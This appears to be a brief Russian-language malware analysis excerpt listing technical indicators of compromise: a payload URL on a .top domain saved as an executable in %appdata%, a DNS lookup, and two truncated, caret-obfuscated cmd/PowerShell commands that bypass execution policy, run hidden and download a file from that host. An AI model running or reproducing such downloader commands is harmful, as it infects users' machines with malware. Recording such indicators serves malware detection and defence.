Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^werShEll^.^e^x^E -exeC^uT^iO^NP^oLICy B^y^P^ASs -n^oprOfi^lE -wi^NdoWstY^le^ hIdD^e^n (N^EW-ObJe^Ct S^ySTEM^.^n^eT.weBCLI^eNT).DO^W^NL^O^A^dF^ILE(^'http://www.fapoergol.top/read.p...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "PO^werShEll^.^e^x^E -exeC^uT^iO^NP^oLICy B^y^P^ASs -n^oprOfi^lE -wi^NdoWstY^le^ hIdD^e^n (N^EW-ObJe^Ct S^ySTEM^.^n^eT.weBCLI^eNT).DO^W^NL^O^A^dF^ILE(^'http://www.fapoergol.top/read.p...' (со скрытым окном)